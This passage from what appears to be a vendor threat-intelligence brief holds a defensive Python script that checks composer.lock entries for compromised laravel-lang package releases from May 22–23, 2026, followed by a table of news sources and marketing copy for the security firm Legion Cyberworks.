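packages, the May 22-23, 2026 compromise window, and the injected
helpers.php wired into Composer autoload.files. Using a lock entry's
`time` (the release timestamp Composer records) as a proxy for "installed
during the window" is an assumption of this example. SAMPLE_LOCK is
constructed.
"""
import json
from datetime import datetime, timezone
from typing import Dict, List, Optional

AFFECTED_PACKAGES = {
    "laravel-lang/lang",
    "laravel-lang/http-statuses",
    "laravel-lang/attributes",
    "laravel-lang/actions",
}
WINDOW_START = datetime(2026, 5, 22, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 5, 24, tzinfo=timezone.utc)  # exclusive: covers May 22-23
INJECTED_FILE = "helpers.php"


def _release_time(pkg: dict) -> Optional[datetime]:
    """Parse the ISO-8601 `time` field; naive values are treated as UTC,
    absent or malformed values as unknown (None)."""
    raw = pkg.get("time")
    if not raw:
        return None
    try:
        dt = datetime.fromisoformat(raw.replace("Z", "+00:00"))
    except ValueError:
        return None
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def audit_package(pkg: dict) -> List[str]:
    """Reasons one lock entry is suspicious (empty list if clean).
    Only the affected laravel-lang packages are examined: other packages
    legitimately autoload a helpers.php, so a global match would be noise."""
    if pkg.get("name") not in AFFECTED_PACKAGES:
        return []
    reasons: List[str] = []
    files = pkg.get("autoload", {}).get("files", [])
    if any(f.rsplit("/", 1)[-1].lower() == INJECTED_FILE for f in files):
        reasons.append("helpers.php wired into autoload.files (injected loader)")
    released = _release_time(pkg)
    if released is not None and WINDOW_START <= released < WINDOW_END:
        reasons.append(f"release time {released.isoformat()} inside "
                       "May 22-23 compromise window")
    return reasons


def audit_lock(lock_text: str) -> Dict[str, List[str]]:
    """Map each flagged package across `packages` and `packages-dev`
    to its reasons."""
    lock = json.loads(lock_text)
    flagged: Dict[str, List[str]] = {}
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        reasons = audit_package(pkg)
        if reasons:
            flagged[pkg["name"]] = reasons
    return flagged


# Constructed lock excerpt: one poisoned release, one in-window release
# without the loader, one older clean release, and an unrelated package that
# legitimately autoloads a helpers.php (must not be flagged).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel-lang/lang", "version": "15.7.1",
         "time": "2026-05-22T18:40:00+00:00",
         "autoload": {"psr-4": {"LaravelLang\\Lang\\": "src/"},
                      "files": ["helpers.php"]}},
        {"name": "laravel-lang/http-statuses", "version": "4.3.2",
         "time": "2026-05-23T02:15:00Z",
         "autoload": {"psr-4": {"LaravelLang\\HttpStatuses\\": "src/"}}},
        {"name": "laravel-lang/attributes", "version": "2.14.0",
         "time": "2026-05-10T09:00:00+00:00",
         "autoload": {"psr-4": {"LaravelLang\\Attributes\\": "src/"}}},
        {"name": "laravel/framework", "version": "12.4.0",
         "time": "2026-05-22T12:00:00+00:00",
         "autoload": {"files": ["src/Illuminate/Support/helpers.php"]}},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    # For a real project: audit_lock(open("composer.lock").read())
    for name, reasons in audit_lock(SAMPLE_LOCK).items():
        print(f"{name}: " + "; ".join(reasons))
```

A hit on either indicator is a reason to follow the brief's remediation line (rotate developer and CI/CD credentials today), not proof of compromise on its own; the vendor signatures the brief cites remain the authoritative check.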
Intelligence Sources
| Source | Contribution | Link |
|---|---|---|
| SecurityWeek | Scattered Mantis NGINX Rift adoption confirmation; Ghost CMS campaign expansion to 900+ sites; Lumma Stealer payload analysis | securityweek.com |
| The Hacker News | Ghost CMS new victim confirmation (MIT, BBC); Laravel-Lang credential operationalization reporting; VMware vCenter CVE-2026-44210 disclosure coverage | thehackernews.com |
| Broadcom / VMware Security Advisories | CVE-2026-44210 original disclosure (VMSA-2026-0014); affected version range; patch availability | vmware.com/security |
| Snyk / Aikido Security | Laravel-Lang supply chain credential operationalization confirmation; updated detection signatures; affected organization count | snyk.io / aikido.dev |
| Bleeping Computer / Krebs on Security | VMware vCenter CVE-2026-44210 technical analysis; Scattered Mantis NGINX Rift campaign reporting; holiday weekend threat actor activity patterns | bleepingcomputer.com / krebsonsecurity.com |
| Picus Security | NGINX Rift CVE-2026-42945 updated exploit chain analysis; Scattered Mantis TTP correlation; webshell artifact detection guidance | picussecurity.com |
| Security Boulevard / rud.is | Dirty Frag technical analysis; NGINX Rift + Dirty Frag + Scattered Mantis kill-chain assessment; holiday risk window analysis | securityboulevard.com |
| Help Net Security | NGINX Rift scanning cluster attribution; VMware vCenter CVE-2026-44210 background and historical exploitation context; Volt Typhoon vCenter interest assessment | helpnetsecurity.com |
About Legion Cyberworks
Helping You Compete and Operate with Resilience
At Legion Cyberworks, we believe resilience is a competitive advantage. We partner with organizations to strengthen cybersecurity resilience through proactive defense, strategic guidance, and continuous protection — helping businesses prepare for, withstand, and recover from evolving cyber threats so they can operate and compete with confidence in an unpredictable digital world.
🛡 Managed Security Services
24/7 monitoring, detection, and response for your environment — backed by our Spectra certification and supported by a warranty in the event of an incident.

🔍 Penetration Testing
Comprehensive offensive security assessments to identify and validate vulnerabilities before adversaries do — across network, application, and cloud environments.

🎯 Assumed Breach Exercises
Realistic adversary simulation starting from an assumed foothold — testing your detection, containment, and response capabilities under real-world conditions.

🚨 Incident Response & Digital Forensics
Rapid response when it matters most — from containment and eradication through forensic investigation, root cause analysis, and post-incident reporting.

✦ SPECTRA CERTIFIED
Legion Cyberworks holds a Spectra certification, meaning we meet rigorous independent auditing requirements across our security operations and service delivery. For our Managed Security Services clients, Spectra certification delivers two key advantages: preferred rates on cyber insurance coverage from participating insurers, and a service warranty — applied toward our fees in the event of a qualifying incident.
To learn more about how Legion Cyberworks can help your organization prepare for and defend against cyber attacks, contact us at [email protected].